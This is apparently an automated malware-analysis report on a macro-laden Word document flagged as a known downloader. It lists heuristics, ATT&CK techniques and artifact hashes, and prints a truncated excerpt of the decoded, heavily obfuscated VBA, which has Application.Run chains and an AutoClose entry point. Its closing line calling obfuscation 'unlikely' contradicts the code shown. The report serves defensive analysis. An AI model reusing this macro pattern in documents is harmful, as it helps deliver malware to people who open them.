MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically triggering Auto_Close and CreateObject heuristics. The ClamAV detection 'Doc.Malware.Emooodldr-6711604-0' strongly suggests a known downloader family. The VBA script contains calls to Application.Run, indicating an attempt to execute further code, likely to download and execute a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project (VBA macros present)
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL extracted from this sample was an OOXML/Office schema namespace URI labelled "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12511 bytes | 80982e57bd8abf6958604fcc0d879bebb3fce844b5761fe0f916703f1123dc85 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub cGwxNgpNMpIpQV()
PpPIjwXEZID = "CpfY" + "ioowIGpiUTgXVLDkiiLJFRvL" + "juNBzfKTqWkJfuxYMkUIC"
kAHUzQHJQp = 386.56 - Atn(890.43) - Atn(718.86) - 592.17 - 730.23 - 850.37
nfrfpcq = 552.34 + Atn(394.45) + 116.57 + Atn(314.43) + Atn(80.23) + 8.71
Application.Run "gHvJQckwqrKEHE"
QDrZUADEo = Atn(183.68) - Atn(290.33) - 879.57 - 168.23 - Atn(879.66) - Atn(227.72) - Atn(934.72) - 215.53
CrLFCwWgnz = Atn(405.93) + 433.25 + 810.7 + Atn(631.46)
vWiIHkTD = Left("KTciikLiKw", 8) + "nkXJqLwMQH" + Left("kALpojuJun", 2) + "VTyLGHHGP" + "HWcYKABVcKu"
End Sub
Sub UnGpgLqJWDUHBV()
ZOGqIRqp = Atn(218.32) + Atn(998) + Atn(892.26) + Atn(244.54) + 900.82 + Atn(201.56)
ixZSbRCKCdC = "BALoI" + "Iuo" + Left("jGLApgYoVu", 7) + "jHU"
GpoJxpjorCS = 290.52 - Atn(770.3) - Atn(317.1) - Atn(526.12) - Atn(491.65) - Atn(806.27)
KvnBCubYUpDx = Atn(405.18) + 287.55 + Atn(674.4) + 160.41 + 841.85 + Atn(308.8)
FkCRXZv = "VAYYD" + "JRKwzdWvyPQXMkfoW"
EwMgFDTrpiU = Left("vvACNEJcdL", 1) + "ZcWRdJUCEIJCfu" + "EYzVKZbgELwuCED" + "fZEdjzQn"
Application.Run "vWoORdFiYyzvTgJwi"
FFHupQN = LTrim("YDGobJoAqgqOYPLMTWXziBcCDMyZo") + "YnvoYJvIYjCSkHPB" + LTrim("FjfSKAFqSbbCRqXGRZ")
ikxGgOnKfY = 153.82 + 562.66 + 914.33 + 803.55 + 323.53 + Atn(67.1)
ifTTcbrpRXnc = RTrim("nLDkESAiSWxvDzwYvrZQMZ") + "DjvSrwYSvGJMg" + "FcEcjWKKTq" + "fVHdbX"
popdjAyCFpop = Atn(220.37) - Atn(509.82) - Atn(685.13) - 469.66 - 79.24
QcjOXdjSMGrc = "GwdQ" + Left("JVQXbEcwEi", 7) + "ryUGXYVTrN" + "UxYRiZn" + Left("jLIvoULocO", 5)
End Sub
Public Function XqBjwqCqYIVzd(HkTgFHIQwvndyS, kBgRSWGEqKpBjXFMO, DUPkEcArJRBwqqdpx)
bgvLnDIACWE = "Un" + RTrim("PdHjBEWQv") + "jFCAfvggUFOYOfzJAqEkgWfkEA" + "ITDWRFDTUEwyjriOCQBKnEzvkAH"
njSZVpkI = LTrim("JpfKPEzczPLyuxxRJjzV") + "OcgbWdBZGx" + "OokcyPQ" + "HVSYDKGRZWBPd"
nCDQjDwM = Atn(789.9) - 685.36 - Atn(455.79) - 566.47 - Atn(988)
XqBjwqCqYIVzd = Replace(HkTgFHIQwvndyS, kBgRSWGEqKpBjXFMO, DUPkEcArJRBwqqdpx)
TjTRyoWnJG = Left("gcXWurEjuc", 4) + "KMHyUXdBkKMU"
bDWDHpD = "iDKKGDdKfLqTEYVYpSco" + "wxOMEYoWD"
gppJJPoKxDLr = 916.3 + 402.59 + Atn(198.1) + Atn(775.35)
HEpAJbjFPQ = "TEKF" + RTrim("LxyiUXTBbURPgQbAHQKrBACJkSLwL") + "CQJPEbvJrxrqNBoYvxwIdMzD"
uMJDyiPH = "vYBAMSW" + "DqGMFCOJULNxU" + "wCU" + Left("DPbKySiLJj", 2)
PnXpwuyyuPK = Left("fwRcBCIYpp", 4) + "fqY" + "gzADcwOMiq" + "ggxI"
DKYEPzOUgWfQ = RTrim("bRnvEWVLMPGjdzBEECqkH") + "oObkUIUMEqFUJQpFnRKdKybpZidAK"
iFkfinDbwTU = "oIwjNBuviNdIFJzXG" + "rOTnrVjEKFyRbAZCAPPFErdAx"
BiJvVvgJzqiB = "nicMEXHIrMAiFG" + "uRrBiExQNVWcwO" + Left("MARZbRHzZn", 7)
FciNdoTTWK = 156.57 - Atn(899.1)
EIWRdArbDp = "kN" + "vbKvLVPXEyEUduVNbZxHIuVcGFYn"
zbuWODiVdfg = 871.26 - 65.49 - Atn(648.9) - Atn(338.4) - 355.25
GARfxIXiZMJ = 372.89 - 266.13 - 619.41 - Atn(274.69)
yoojVXEMUS = "JwRGHDoXECLfYbE" + "IZwfrk" + "ZEBqVdZ" + Left("oUnxcwAxki", 9)
End Function
Sub gHvJQckwqrKEHE()
DzwxcdCgQb = Left("UbfoSqJzYk", 3) + Left("YJSFyuBNIZ", 9) + "BOX" + "YxLnMM" + "SWPJGijPqUpDP"
xbcIqDd = 354.39 + 569.16 + Atn(134.3) + Atn(142.24) + 187.49
OTyHRfBxBqo = 115.81 + 752.57 + Atn(489.17) + Atn(419.87) + Atn(136.35)
Application.Run "JjzDBKRAXdxcBQ"
zIuzHrWB = "xDCrHQY" + Left("QHzHDWIFwf", 10) + Left("JuHUNNTbVc", 6)
yGQnJfCCun = LTrim("cFjPrfSXPEzAiFkMzzbMpRpWMZMwx") + "xZogrPBVokvNN" + LTrim("rPYAWFRvfuHkByPguLvLuCMbMJWMo") + "cWibVpGucuMwkAZnCDzANTzngu" + "oGiKAjYPuoL" + LTrim("OSgJFMxGbHYOywVQxvHPjvcrDOM")
CjpgPoOE = RTrim("VqQDQEHRYgFgFnDufEQWM") + "YppOZGGxxbJunPpBdHOwcKZWONvJ" + "DpkgWLCOWpKTYYVqZD" + LTrim("bTzQQppqFrXTXxZOquxBkBDiVKyv")
xPvMbbGkfu = 285.88 - 944.16 - 663.6 - 911.65 - 656.52
ScivPji = "YAEScRPnFEGRgrqiPrMjkro" + "KHbHxBkTnVyYDxS"
End Sub
Sub AutoClose()
GiqNxBBn = 660.2 - 516.81 - 972.76 - Atn(120.29)
cURkRGDOMRu = 700.29 - 932.38 - Atn(529.26) - A
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 36864 bytes | 236197081feee7d3469111c78c54244edc2491c8521fe90c6a1ab0dc0a77c94d |

Detection
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely